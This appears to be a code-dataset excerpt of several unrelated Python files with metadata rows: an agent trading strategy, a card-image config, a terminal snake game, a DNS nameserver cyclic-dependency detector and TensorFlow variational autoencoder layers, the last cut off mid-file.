DEFAULT_SEARCH_SERVICE_2 = {"id": "3DX_printing_service", "max_tx_fee": 1, "max_unit_price": 20, "min_quantity": 1, "max_quantity": 3,
"search_query": {
"constraint_type": "==",
"search_key": "seller_service",
"search_value": "3DX_printing_service",}}
class GenericStrategy(Model):
"""This class defines a strategy for the agent."""
def __init__(self, **kwargs: Any) -> None:
"""
Initialize the strategy of the agent.
:return: None
"""
ledger_id = kwargs.pop("ledger_id", None)
self._is_ledger_tx = kwargs.pop("is_ledger_tx", DEFAULT_IS_LEDGER_TX)
self.contract_id = str(ServiceDirectory.PUBLIC_ID)
self.contract_address = kwargs.pop("contract_address", DEFAULT_CONTRACT_ADDRESS)
self.deployer_address = kwargs.pop("deployer_address", DEFAULT_DEPLOYER_ADDRESS)
currency_id = kwargs.pop("currency_id", None)
self._max_negotiations = kwargs.pop("max_negotiations", DEFAULT_MAX_NEGOTIATIONS)
self._search_service_1 = kwargs.pop("search_service_1", DEFAULT_SEARCH_SERVICE_1)
self._search_service_2 = kwargs.pop("search_service_2", DEFAULT_SEARCH_SERVICE_2)
super().__init__(**kwargs)
self._ledger_id = (
ledger_id if ledger_id is not None else self.context.default_ledger_id
)
if currency_id is None:
currency_id = self.context.currency_denominations.get(self._ledger_id, None)
enforce(
currency_id is not None,
f"Currency denomination for ledger_id={self._ledger_id} not specified.",
)
self._currency_id = currency_id
self._is_searching = False
self._balance = 0
@property
def ledger_id(self) -> str:
"""Get the ledger id."""
return self._ledger_id
@property
def is_ledger_tx(self) -> bool:
"""Check whether or not tx are settled on a ledger."""
return self._is_ledger_tx
@property
def is_searching(self) -> bool:
"""Check if the agent is searching."""
return self._is_searching
@is_searching.setter
def is_searching(self, is_searching: bool) -> None:
"""Check if the agent is searching."""
enforce(isinstance(is_searching, bool), "Can only set bool on is_searching!")
self._is_searching = is_searching
@property
def balance(self) -> int:
"""Get the balance."""
return self._balance
@balance.setter
def balance(self, balance: int) -> None:
"""Set the balance."""
self._balance = balance
@property
def max_negotiations(self) -> int:
"""Get the maximum number of negotiations the agent can start."""
return self._max_negotiations
def get_services(self) -> Dict[str, str]:
"""
Get the services to be discovered.
:return: a dictionary of services
"""
self._services = {"search_service_1": self._search_service_1["id"], "search_service_2": self._search_service_2["id"]}
return self._services
def get_contract_terms(self) -> Terms:
"""
Get the contract terms.
:return: the terms of the contract
"""
terms = Terms(
ledger_id=self.ledger_id,
sender_address=self.context.agent_address,
counterparty_address=self.context.agent_address,
amount_by_currency_id={},
quantities_by_good_id={},
nonce="",
)
return terms
def get_service_query(self) -> Query:
"""
Get the service query of the agent.
:return: the query
"""
service_key_filter = Constraint(
self._search_service_1["search_query"]["search_key"],
ConstraintType(
self._search_service_1["search_query"]["constraint_type"],
self._search_service_1["search_query"]["search_value"],
),
)
query = Query([service_key_filter], model=SIMPLE_SERVICE_MODEL)
return query
def is_acceptable_proposal(self, proposal: Description) -> bool:
"""
Check whether it is an acceptable proposal.
:return: whether it is acceptable
"""
result = (
all(
[
key in proposal.values
for key in [
"ledger_id",
"currency_id",
"price",
"service_id",
"quantity",
"tx_nonce",
]
]
)
and proposal.values["ledger_id"] == self.ledger_id
and proposal.values["price"] > 0
and proposal.values["quantity"] >= self._search_service_1["min_quantity"]
and proposal.values["quantity"] <= self._search_service_1["max_quantity"]
and proposal.values["price"]
<= proposal.values["quantity"] * self._search_service_1["max_unit_price"]
and proposal.values["currency_id"] == self._currency_id
and proposal.values["service_id"] == self._search_service_1["id"]
and isinstance(proposal.values["tx_nonce"], str)
and proposal.values["tx_nonce"] != ""
)
return result
def is_affordable_proposal(self, proposal: Description) -> bool:
"""
Check whether it is an affordable proposal.
:return: whether it is affordable
"""
if self.is_ledger_tx:
payable = proposal.values.get("price", 0) + self._search_service_1["max_tx_fee"]
result = self.balance >= payable
else:
result = True
return result
def terms_from_proposal(
self, proposal: Description, counterparty_address: Address
) -> Terms:
"""
Get the terms from a proposal.
:param proposal: the proposal
:return: terms
"""
buyer_address = self.context.agent_addresses[proposal.values["ledger_id"]]
terms = Terms(
ledger_id=proposal.values["ledger_id"],
sender_address=buyer_address,
counterparty_address=counterparty_address,
amount_by_currency_id={
proposal.values["currency_id"]: -proposal.values["price"]
},
quantities_by_good_id={
proposal.values["service_id"]: proposal.values["quantity"]
},
is_sender_payable_tx_fee=True,
nonce=proposal.values["tx_nonce"],
fee_by_currency_id={proposal.values["currency_id"]: self._search_service_1["max_tx_fee"]},
)
return terms
#TODO: Check if this could be used in current use-case!
def get_acceptable_counterparties(
self, counterparties: Tuple[str, ...]
) -> Tuple[str, ...]:
"""
Process counterparties and drop unacceptable ones.
:return: list of counterparties
"""
valid_counterparties: List[str] = []
for idx, counterparty in enumerate(counterparties):
if idx < self.max_negotiations:
valid_counterparties.append(counterparty)
return tuple(valid_counterparties)
def successful_trade_with_counterparty(
self, counterparty: str, data: Dict[str, str]
) -> None:
"""
Do something on successful trade.
:param counterparty: the counterparty address
:param data: the data
:return: False
"""
self.context.logger.info("trade with sender={} was sucessful!".format(counterparty)) | 35.703252 | 164 | 0.612205 | 986 | 8,783 | 5.173428 | 0.189655 | 0.053519 | 0.041168 | 0.038816 | 0.225838 | 0.149579 | 0.121545 | 0.083513 | 0.057636 | 0.043521 | 0 | 0.007803 | 0.284982 | 8,783 | 246 | 165 | 35.703252 | 0.804459 | 0.136855 | 0 | 0.10559 | 0 | 0 | 0.129786 | 0.003732 | 0 | 0 | 0.000829 | 0.004065 | 0 | 1 | 0.099379 | false | 0 | 0.049689 | 0 | 0.229814 | 0.024845 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2f960a841a29c49b6bce21728d2e4a50058e8c9 | 755 | py | Python | lib/configurations.py | LeeHuangChenCS/Scryfall_TabletopSim_Project | 7dac1f8a3a83eb1008f56b3f9f37ab28cce21a02 | [
"CNRI-Python"
] | null | null | null | lib/configurations.py | LeeHuangChenCS/Scryfall_TabletopSim_Project | 7dac1f8a3a83eb1008f56b3f9f37ab28cce21a02 | [
"CNRI-Python"
] | null | null | null | lib/configurations.py | LeeHuangChenCS/Scryfall_TabletopSim_Project | 7dac1f8a3a83eb1008f56b3f9f37ab28cce21a02 | [
"CNRI-Python"
] | null | null | null | cache_folder = "Resources"
cache_filename = "cacheInfo.cpickle"
# image size to download: use either "small", "normal", "large"
imageSize = "large"
# the folder that all images will be downloaded to
imageFolder = "Resources/CardImages"
# the extention to use for downloading the images
downloadImageExtensions = ".jpg"
# decklist folder
decklistFolder = "DeckLists"
# empty json deck location
emptyDeckLoc = "Resources/emptyDeck.json"
# dummy json card location
dummyCardLoc = "Resources/dummyCard.json"
# dummy deck entry location
dummyEntry = "Resources/dummyDeckEntry.json"
# the url used for the backs of magic cards
BackURL = 'https://i.imgur.com/0lQuqfe.jpg'
# the location of the saved folder
savedFolderFile = "Resources/savedFolder.txt"
| 25.166667 | 63 | 0.768212 | 94 | 755 | 6.148936 | 0.659574 | 0.031142 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001541 | 0.140397 | 755 | 29 | 64 | 26.034483 | 0.88906 | 0.430464 | 0 | 0 | 0 | 0 | 0.469048 | 0.242857 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2f9d6e64e8c230a309cfab603645d8f8e1a7046 | 2,710 | py | Python | snake4.py | stolk/ZeroToSnake | 0f883558967a758d2441ef969b3828c96700682a | [
"Unlicense"
] | 1 | 2017-12-21T00:47:58.000Z | 2017-12-21T00:47:58.000Z | snake4.py | stolk/ZeroToSnake | 0f883558967a758d2441ef969b3828c96700682a | [
"Unlicense"
] | null | null | null | snake4.py | stolk/ZeroToSnake | 0f883558967a758d2441ef969b3828c96700682a | [
"Unlicense"
] | null | null | null | #!/usr/bin/python
#
# snake4.py adds food to the board.
import curses
import time
import random
# Our snake lives in a world of 15 rows of 25 characters.
world = [
"+-----------------------+",
"| |",
"| |",
"| |",
"| |",
"| |",
"| |",
"| |",
"| |",
"| |",
"| |",
"| |",
"| |",
"| |",
"+-----------------------+",
]
# Our snake is defined as a list of coordinates (row,col) where its body is.
# We start as a snake of lenght 3, traveling to the right.
snake_body = [
( 7,7 ), # The head on the right.
( 7,6 ),
( 7,5 ), # The tail on the left.
]
# The direction that the snake is traveling as delta for row and delta for col.
snake_drow = 0
snake_dcol = 1
food = ( 7,20 )
def draw_board( screen, board ) :
for linenr, row in enumerate( board ):
line = "".join( row )
screen.addstr( linenr+1, 0, line )
# We move the snake by adding a new head, and clearing its old tail (unless it needs to grow.)
# Returns True if the snake died because of the move.
def move_snake() :
global snake_body
global food
# Figure out where the head of the snake will move to.
head_row, head_col = snake_body[ 0 ] # Current location.
head_row += snake_drow
head_col += snake_dcol
# Did the snake eat its own body?
if ( head_row, head_col ) in snake_body :
return True
# Did the snake eat the food?
ate_food = ( head_row, head_col ) == food
if ate_food :
# Spawn new food at a random location on the board.
food = ( int(random.uniform(1,15)), int(random.uniform(1,24) ) )
# Re-assemble the body with a new head.
snake_body = [ ( head_row, head_col ) ] + snake_body
if not ate_food :
snake_body.pop() # remove its old tail.
# Did we hit the fence?
if world[ head_row ][ head_col ] != ' ' :
return True
return False
def main( stdscr ):
died = False
while not died:
stdscr.clear()
stdscr.addstr( 0, 0, "Snake game. Ctrl-C to quit." )
# Build up the board: start with a copy of the empty world.
board = [ list(row) for row in world ]
# Place the snake on our board.
for idx, ( row, col ) in enumerate( snake_body ) :
symbol = '#' if idx > 0 else 'O'
board[ row ][ col ] = symbol
# Place the food on the board.
board[ food[0] ][ food[1] ] = '*'
# Now that we have set up the board, we should draw it on screen.
draw_board( stdscr, board )
stdscr.refresh()
# Now move the snake.
died = move_snake()
time.sleep( 0.2 )
curses.wrapper(main)
| 23.362069 | 94 | 0.553875 | 387 | 2,710 | 3.79845 | 0.338501 | 0.04898 | 0.037415 | 0.047619 | 0.031293 | 0.031293 | 0 | 0 | 0 | 0 | 0 | 0.01779 | 0.315498 | 2,710 | 115 | 95 | 23.565217 | 0.774663 | 0.357565 | 0 | 0.265625 | 0 | 0 | 0.236597 | 0.029138 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046875 | false | 0 | 0.046875 | 0 | 0.140625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2fae2a3aae524112dc57b558d41fdd95b973c04 | 13,279 | py | Python | CyclicDetector.py | EduardoATpt/CycleHunter | 50c17ab827ab7a9c98e677d5cd79b1500992ac8d | [
"BSD-2-Clause"
] | null | null | null | CyclicDetector.py | EduardoATpt/CycleHunter | 50c17ab827ab7a9c98e677d5cd79b1500992ac8d | [
"BSD-2-Clause"
] | null | null | null | CyclicDetector.py | EduardoATpt/CycleHunter | 50c17ab827ab7a9c98e677d5cd79b1500992ac8d | [
"BSD-2-Clause"
] | 1 | 2021-02-15T02:05:42.000Z | 2021-02-15T02:05:42.000Z | # new detector
import dns.rcode
import dns.rdatatype
import dns.resolver
import datetime
import json
import random
import multiprocessing
import argparse
import logging
import tqdm
from collections import defaultdict
from domutils import getparent
'''
1. read the zone file, for each entry with an NS record
#find TIMEOUT domains
2. for each domain d, loops from its NSSet
3. For each NS in NSSet, try to:
* get A
* get AAAA
4a. If any A/AAAA resolves, domain is OK
4b. If all NSSet is NXDOMAIN, domain cannot be resolved (other type of error)
4c. IF A/AAAA resolves, but NSSet is noth auth , then it is out of scope of this cod
4d. If ALL A/AAAA, timeout, then we may be up to something.
#domains timeout to cyclic dependency.
1. Loop trhough the domains above
2. For each NS on NSSet, get its parent auth server
3. Ask the parent for the auth servers of these domains
4. compare 3 to 2 , and see if they are in cyclic dependency
#todo first
1. write a class for NS
2. write a class for NSSet
3. wirte a class for domain
'''
class NS:
def __init__(self, servername):
self.serverName = servername
self.A = set()
self.AAAA = set()
self.NXDOMAIN = False
self.timeoutv4 = False
self.timeoutv6 = False
self.NOANSWERv4 = False
self.NOANSWERv6 = False
self.reachable = False
self.reachablev4 = False
self.reachablev6 = False
def IsReachable(self):
if not self.NXDOMAIN:
if len(self.A) > 0 or len(self.AAAA) > 0:
return True
else:
return False
def fetch_glue(ns):
temp_ns = NS(ns)
try:
answer = dns.resolver.resolve(ns, 'A')
response = answer.response
# print(type(response))
rcode = response.rcode()
if rcode == dns.rcode.Rcode.NOERROR:
temp_ns.reachable = True
temp_ns.reachablev4 = True
temp_ns.A = set(str(addr) for addr in response.answer)
elif rcode == dns.rcode.Rcode.NXDOMAIN:
temp_ns.NXDOMAIN = True
except dns.resolver.Timeout:
temp_ns.timeoutv4 = True
except dns.resolver.NoAnswer:
temp_ns.NOANSWERv4 = True
except dns.resolver.NXDOMAIN:
temp_ns.NXDOMAIN = True
# now, check v6 only if v4 does not work
if not temp_ns.reachable and (temp_ns.NOANSWERv4 or temp_ns.timeoutv4):
try:
answer = dns.resolver.resolve(ns, 'AAAA')
response = answer.response
# print(type(response))
rcode = response.rcode()
if rcode == 0:
temp_ns.reachable = True
temp_ns.reachablev6 = True
temp_ns.AAAA = set(str(addr) for addr in response.answer)
elif rcode == 3:
temp_ns.NXDOMAIN = True
except dns.resolver.Timeout:
temp_ns.timeoutv6 = True
except dns.resolver.NoAnswer:
temp_ns.NOANSWERv6 = True
except dns.resolver.NXDOMAIN:
temp_ns.NXDOMAIN = True
return temp_ns
def getParentNSes(k):
# get the parent
parent = getparent(k)
toBeRet = []
try:
try:
answer = dns.resolver.resolve(parent, 'NS')
response = answer.response
# print(type(response))
rcode = response.rcode()
# parent is valid
if rcode == dns.rcode.NOERROR:
try:
localA = response.answer
for k in localA:
for addr in k.items:
try:
tempNS = addr.target
toBeRet.append(str(tempNS))
except Exception as e:
logging.error(f"{k}: NS from parent has No A - {e}")
except Exception as e:
logging.error(f'{k}: auth server has no NS, reason {e}')
pass
elif rcode == dns.rcode.NXDOMAIN:
logging.info(f"{parent} NXDOMAIN")
toBeRet.append(-1)
elif rcode == dns.rcode.SERVFAIL:
logging.info(f"{parent} SERVFAIL")
except Exception as e:
logging.error(f"{k}: NS from parent has failed - {e}")
# print(type(e))
return 'ERROR'
except Exception as e:
logging.error(f"{k}: failed to retrieve NS answers - {e}")
return toBeRet
def getNS(parent):
# get the parent
toBeRet = []
try:
answer = dns.resolver.resolve(parent, 'NS')
response = answer.response
# print(type(response))
rcode = response.rcode()
# parent is valid
if rcode == dns.rcode.NOERROR:
try:
localA = response.answer
for k in localA:
for addr in k.items:
try:
tempNS = addr.target
toBeRet.append(str(tempNS))
except Exception as e:
logging.error(f"{k}: failed getting ns getNS() for {parent} - {e}")
except Exception as e:
logging.error(f"{parent}: no NS - {e}")
pass
elif rcode == dns.rcode.NXDOMAIN:
logging.error(f"Parent {parent} does not exist")
toBeRet.append(-1)
except Exception as e:
return 'TIMEOUT'
return toBeRet
def getA(ns):
address = []
try:
answer = dns.resolver.resolve(ns, 'A')
response = answer.response
# print(type(response))
rcode = response.rcode()
if rcode == dns.rcode.NOERROR:
try:
localA = response.answer
for k in localA:
for addr in k.items:
address.append(str(addr))
except Exception as e:
logging.error(f"{ns}: no A, reason {e}")
pass
elif rcode == dns.rcode.NXDOMAIN:
address.append(-1)
except Exception as e:
logging.error(f"Querying A for {ns} produced exception {e}")
return address
def getSOA(ns):
# try to get a SOA, if it fails return ERROR
try:
answer = dns.resolver.resolve(ns, 'SOA')
response = answer.response
# print(type(response))
rcode = response.rcode()
if rcode == dns.rcode.NOERROR:
return 0
elif rcode == dns.rcode.NXDOMAIN:
return -1
elif rcode == dns.rcode.SERVFAIL:
return "ERROR"
except Exception as e:
logging.error(f"Querying SOA for {ns} generated an exception {e}")
return 'ERROR'
def retrieveNSFromParent(fqdn, ip_from_auth_server):
queryType = dns.rdatatype.NS
try:
ip_from_auth_server = ip_from_auth_server[0]
except Exception as e:
logging.error(f"Using {ip_from_auth_server} triggered an exception {e}")
query = dns.message.make_query(fqdn, queryType)
ret = defaultdict(list)
try:
response = dns.query.udp(query, ip_from_auth_server, timeout=5)
except Exception as e:
logging.error(f"Failed {fqdn} query to {ip_from_auth_server} - {e}")
response = "NA"
if response != "NA":
if len(response.answer) > 0:
logging.error(f"shoot, {fqdn} has answer at parent")
elif len(response.answer) == 0 and len(response.authority) > 0:
rcode = response.rcode()
if rcode == dns.rcode.NOERROR:
for item in response.authority:
if item.rdtype == dns.rdatatype.SOA:
# print("has soa, all GOOD")
return 'SOA'
elif item.rdtype == dns.rdatatype.NS:
for addr in item.items:
namez = str(item.name)
ret[namez].append(str(addr))
return ret
elif rcode == dns.rcode.NXDOMAIN:
return 'NXDOMAIN'
def probe_ns(nsname):
localSoa = getSOA(nsname)
res = None
# only analyze nses that have no soa
if localSoa == 'ERROR':
logging.error(f"{nsname} has error with SOA query")
isOK = False
timeOUtButNotFromParent = False
bailiStatus = False
tempTest = getparent(nsname)
if tempTest != "" and len(tempTest.split(".")) < 2:
# print(str(tempTest))
logging.info(f"{nsname} is already at the top (tld), skip it")
else:
parentNS = getParentNSes(nsname)
logging.info(f"the parent domain of {nsname} is {parentNS}")
if isinstance(parentNS, list):
# check if in bailwikc at least one
sp2 = nsname.split(".")
baili = ''
for ww in range(1, len(sp2) - 1):
baili = baili + "." + sp2[ww]
if baili[0] == ".":
baili = baili[1:]
for e in parentNS:
logging.info(f"{nsname} has bailiwick {baili} and nameserver {e}")
if baili in e:
logging.info(f"Result: {nsname} is fine has NS in bailiwick {e}")
bailiStatus = True
break
elif parentNS == "ERROR":
tempP = getparent(nsname)
tempP = getparent(tempP)
if len(tempP) > 0:
if tempP[-1] != '.':
tempP = tempP + "."
else:
print(f"tempP is {tempP}")
parentNS = getNS(tempP)
timeOUtButNotFromParent = True
logging.info(f"{nsname} has timed out via normal resolution")
if not bailiStatus:
for singleNS in parentNS:
if not isOK:
tempA = getA(singleNS)
if tempA != -1:
tempNSParent = retrieveNSFromParent(nsname, tempA)
# we only add domains here if they timeout
if timeOUtButNotFromParent and isinstance(tempNSParent, dict):
res = tempNSParent
logging.info(f"Result: {nsname} has been added")
isOK = True
elif tempNSParent == 'SOA':
isOK = True
logging.info(f"Result: {nsname} has SOA (is fine)")
# do nothing domain is ok
elif tempNSParent == 'NXDOMAIN':
isOK = True
logging.info(f"Result: {nsname} IS NXDOMAIN")
return nsname, res
def probeNSes(setOfNSes, workers=5):
results = dict()
ns_total = len(setOfNSes)
counter = 0
with multiprocessing.Pool(processes=workers) as pool:
for nsname, probe_res in tqdm.tqdm(pool.imap_unordered(probe_ns, setOfNSes, chunksize=15), total=ns_total):
counter += 1
if probe_res is not None:
results[nsname] = probe_res
return results
def readFAST(filename):
with open(filename, 'r') as f:
nsset = set(line.strip() for line in f.readlines())
return nsset
'''
Definition of cyclic domain is the following:
* at least one it's NS point to another NS/CNAME '''
def map_nsset(nsset_file, output_file, limit=None, workers=5):
logging.info('start reading zone file')
before = datetime.datetime.now()
nsRecords = readFAST(nsset_file)
logging.info('end reading zone file')
after = datetime.datetime.now()
diff = (after - before).seconds
logging.info(f"It took {diff} seconds to read the file")
logging.info("start detect cycles")
logging.info(f"the number of nsRecords is {len(nsRecords)}")
if limit is None:
# now shuffle the set
lRecords = list(nsRecords)
random.shuffle(lRecords)
else:
lRecords = random.sample(nsRecords, limit)
timeOutNSes = probeNSes(lRecords, workers=workers)
with open(output_file, 'w') as fp:
json.dump(timeOutNSes, fp)
print("und jetz? ")
if __name__ == '__main__':
# Setup logging if called from command line
logging.basicConfig(filename='nameserver-mapper.log',
level=logging.INFO, format="%(asctime)s ns_mapper: %(levelname)s %(message)s")
# Read the command line arguments
argparser = argparse.ArgumentParser(
description="Fetches the glue records for the list of nameservers in the input file")
argparser.add_argument('nsset_file', type=str, help="File with the list of nameservers")
argparser.add_argument('output_file', type=str, help="File to save the mapping")
argparser.add_argument('--limit', type=int, required=False, default=None,
help="Restrict the list of nameserver, use for testing")
args = argparser.parse_args()
map_nsset(args.nsset_file, args.output_file, limit=args.limit)
| 32.626536 | 115 | 0.548535 | 1,544 | 13,279 | 4.669689 | 0.209197 | 0.015811 | 0.025243 | 0.029958 | 0.30957 | 0.297365 | 0.254092 | 0.222607 | 0.185437 | 0.158946 | 0 | 0.007426 | 0.361096 | 13,279 | 406 | 116 | 32.706897 | 0.842409 | 0.043603 | 0 | 0.342657 | 0 | 0 | 0.120445 | 0.005351 | 0 | 0 | 0 | 0.002463 | 0 | 1 | 0.041958 | false | 0.01049 | 0.041958 | 0 | 0.15035 | 0.006993 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2fc2a55d65e03413a6c5d1e057a56b832440a05 | 14,037 | py | Python | networks/autoencoder/vae.py | annachen/dl_playground | f263dc16b4f0d91f6d33d94e678a9bbe2ace8913 | [
"MIT"
] | null | null | null | networks/autoencoder/vae.py | annachen/dl_playground | f263dc16b4f0d91f6d33d94e678a9bbe2ace8913 | [
"MIT"
] | null | null | null | networks/autoencoder/vae.py | annachen/dl_playground | f263dc16b4f0d91f6d33d94e678a9bbe2ace8913 | [
"MIT"
] | null | null | null | import tensorflow as tf
import numpy as np
from dl_playground.networks.layers import mlp, cnn
from dl_playground.networks.autoencoder import losses
class VAELayer(tf.keras.layers.Layer):
"""Variational Autoencoder layer.
Note: sigma here is the covariance matrix; it's equivalent to
variance in univariate Gaussian, and not std.
Parameters
----------
n_input_channels : int
n_vars : int
encoder_filters : [int]
Number of filters for the encoder. Does not include the last
layer where the network predicts the mean and variance.
decoder_filters : [int]
Number of filters for the decoder. Does not include the last
layer where the network reconstruct the inputs.
reconstruction_type : str
'ce' for cross entropy, or 'mse' for mean square error
kl_type : str
'close' for close-form calculation, 'mc' for monte-carlo
beta : float
The weight on the KL term
kl_add_step : int
The step to add in the KL term loss with weight beta
output_is_logit : bool
summary_image_shape : [int, int, int] | None
name : str
"""
def __init__(
self,
n_input_channels,
n_vars,
encoder_filters,
decoder_filters,
reconstruction_type='ce',
kl_type='close',
beta=1.0,
kl_add_step=0,
output_is_logit=True,
summary_image_shape=None,
name='',
):
super(VAELayer, self).__init__()
self._n_vars = n_vars
self._enc_filters = encoder_filters
self._dec_filters = decoder_filters
enc_filters = encoder_filters + [n_vars * 2]
self._encoder = mlp.MLP(
filters=enc_filters,
last_layer_act_fn='linear',
)
dec_filters = decoder_filters + [n_input_channels]
self._decoder = mlp.MLP(
filters=dec_filters,
last_layer_act_fn='linear',
)
self._recons_type = reconstruction_type
self._kl_type = kl_type
self._beta = beta
self._kl_add_step = kl_add_step
self._output_is_logit = output_is_logit
self._summary_image_shape = summary_image_shape
self._name = name
def encode(self, inputs, training=None):
# inputs: (B, n_feats)
x = self._encoder(inputs, training=training)
# (B, n_vars)
means = x[:, :self._n_vars]
# (B, n_vars)
log_sigmas = x[:, self._n_vars:]
return means, log_sigmas
def sample(self, means, log_sigmas):
batch_size = tf.shape(means)[0]
samples = tf.random.normal(
shape=(batch_size, self._n_vars),
mean=0.0,
stddev=1.0,
)
samples = samples * tf.math.exp(0.5 * log_sigmas) + means
return samples
def decode(self, latent_vars, training=None):
decoded = self._decoder(latent_vars, training=training)
return decoded
def call(self, inputs, training=None):
# inputs: (B, n_feats)
# (B, n_vars), (B, n_vars)
means, log_sigmas = self.encode(inputs, training=training)
# (B, n_vars)
samples = self.sample(means, log_sigmas)
# (B, n_feats)
decoded = self.decode(samples, training=training)
return {
'mean': means,
'log_sigma': log_sigmas,
'samples': samples,
'decoded': decoded,
}
def predict(self, inputs):
pred = self(inputs, training=False)
pred['sigma'] = tf.math.exp(pred['log_sigma'])
pred['decoded'] = tf.nn.sigmoid(pred['decoded'])
return pred
def loss_fn(self, batch, prediction, step):
# TODO: make beta increase over time
if self._recons_type == 'ce':
recons_loss = losses.reconstruction_cross_entropy(
prediction=prediction['decoded'],
labels=batch,
is_logit=True,
)
elif self._recons_type == 'mse':
recons_loss = losses.reconstruction_mean_square_error(
prediction=prediction['decoded'],
labels=batch,
is_logit=True,
)
else:
raise ValueError()
if self._kl_type == 'close':
kl_loss = losses.KL(
mean=prediction['mean'],
log_sigma=prediction['log_sigma'],
)
elif self._kl_type == 'mc':
kl_loss = losses.KL_monte_carlo(
prediction['sample'],
mean=prediction['mean'],
log_sigma=prediction['log_sigma'],
)
else:
raise ValueError()
if step >= self._kl_add_step:
loss = recons_loss + self._beta * kl_loss
else:
loss = recons_loss
return {
'loss': loss,
'recons_loss': recons_loss,
'kl': kl_loss,
}
def train_callback(self):
pass
def compete_fn(self, batch, prediction, training=None):
return self.loss_fn(
batch=batch,
prediction=prediction,
step=self._kl_add_step,
)['loss']
def code_from_encode(self, encode_output):
return encode_output[0]
def code_from_call(self, call_output):
return call_output['mean']
def summary(self, writer, batch, step, training=None):
if self._summary_image_shape is None:
return
recons = self.call(batch, training=training)['decoded']
if self._output_is_logit:
recons = tf.nn.sigmoid(recons)
input_imgs = tf.reshape(
batch, [-1] + self._summary_image_shape
)
recon_imgs = tf.reshape(
recons, [-1] + self._summary_image_shape
)
if self._summary_image_shape[-1] >= 5:
# can't plot images with more than 4 channels
# plot the first 3 channels
input_imgs = input_imgs[..., :3]
recon_imgs = recon_imgs[..., :3]
with writer.as_default():
tf.summary.image(
"input{}".format(self._name), input_imgs, step=step
)
tf.summary.image(
"recons{}".format(self._name), recon_imgs, step=step
)
class ConvVAELayer(tf.keras.layers.Layer):
"""Convolutional Variational Autoencoder layer.
The inputs is first passed through a CNN, whose output shape is
`encoder_cnn_output_shape`. The tensor is then flattened and passed
into a Dense layer with `n_vars` units.
Parameters
----------
input_shape: [int, int, int]
[H, W, C] of the input
n_vars : int
Number of latent variables.
When `use_dense` is True, the top MLP has `n_vars` * 2 nodes.
When `use_dense` is False, the last conv layer has
`n_vars` * 2 channels.
encoder_configs : [cnn.LayerConfig]
The configs of the convolutional layers. Does not include the
last layer where the network predicts the mean and variance.
decoder_configs : [cnn.LayerConfig]
The configs of the decoder layers. Does not include the last
layer where the network reconstruct the inputs.
encoder_cnn_output_shape : [int, int, int]
[H, W, C] of the encoder output. Only used when `use_dense` is
True.
use_dense : bool
Whether to add a dense layer after the conv layers. Default to
True. Note that if this is set to False, the encoder cnn has
to output `n_vars * 2` nodes in total.
reconstruction_type : str
'ce' for cross entropy, or 'mse' for mean square error
kl_type : str
'close' for close-form calculation, 'mc' for monte-carlo
beta : float
The weight on the KL term
kl_add_step : int
The step to add in KL loss
"""
def __init__(
self,
input_shape,
n_vars,
encoder_configs,
decoder_configs,
encoder_cnn_output_shape,
use_dense=True,
reconstruction_type='ce',
kl_type='close',
beta=1.0,
kl_add_step=0,
):
super(ConvVAELayer, self).__init__()
self._n_vars = n_vars
self._enc_configs = encoder_configs
self._dec_configs = decoder_configs
self._enc_output_shape = encoder_cnn_output_shape
self._use_dense = use_dense
self._enc_cnn = cnn.ConvNet(encoder_configs)
self._dec_cnn = cnn.ConvNet(decoder_configs)
if self._use_dense:
self._enc_mlp = mlp.MLP(
filters=[n_vars * 2],
last_layer_act_fn='linear'
)
self._dec_mlp = mlp.MLP(
filters=[np.product(encoder_cnn_output_shape)]
)
self._recons_type = reconstruction_type
self._kl_type = kl_type
self._beta = beta
self._kl_add_step = kl_add_step
def encode(self, inputs, training=None):
"""Encodes.
Parameters
----------
inputs : tf.Tensor, shape (B, H, W, C)
training : bool | None
Returns
-------
means : tf.Tensor
If `use_dense` is True, shape (B, n_vars).
Otherwise, shape (B, H', W', n_vars)
log_sigmas : tf.Tensor
Same shape as `means`
"""
x = self._enc_cnn(inputs, training=training)
if self._use_dense:
batch_size = tf.shape(x)[0]
x = tf.reshape(x, (batch_size, -1)) # (B, H'*W'*C')
x = self._enc_mlp(x, training=training)
# (B, H', W', C) or (B, n_vars)
means = x[..., :self._n_vars]
# (B, H', W', C) or (B, n_vars)
log_sigmas = x[..., self._n_vars:]
return means, log_sigmas
def decode(self, latent_vars, training=None):
"""Decodes.
Parameters
----------
latent_vars : tf.Tensor
If `use_dense` is True, shape (B, n_vars)
Otherwise, shape (B, H', W', n_vars)
training : bool | None
Returns
-------
decoded : tf.Tensor, shape (B, H, W, C)
"""
x = latent_vars
if self._use_dense:
batch_size = tf.shape(x)[0]
x = self._dec_mlp(x, training=training)
x = tf.reshape(x, [batch_size] + self._enc_output_shape)
decoded = self._dec_cnn(x, training=training)
return decoded
def sample(self, means, log_sigmas):
samples = tf.random.normal(
shape=tf.shape(means),
mean=0.0,
stddev=1.0,
)
samples = samples * tf.math.exp(0.5 * log_sigmas) + means
return samples
def call(self, inputs, training=None):
"""Runs the network
Parameters
----------
inputs : tf.Tensor, shape (B, H, W, C)
Returns
-------
outputs : dict
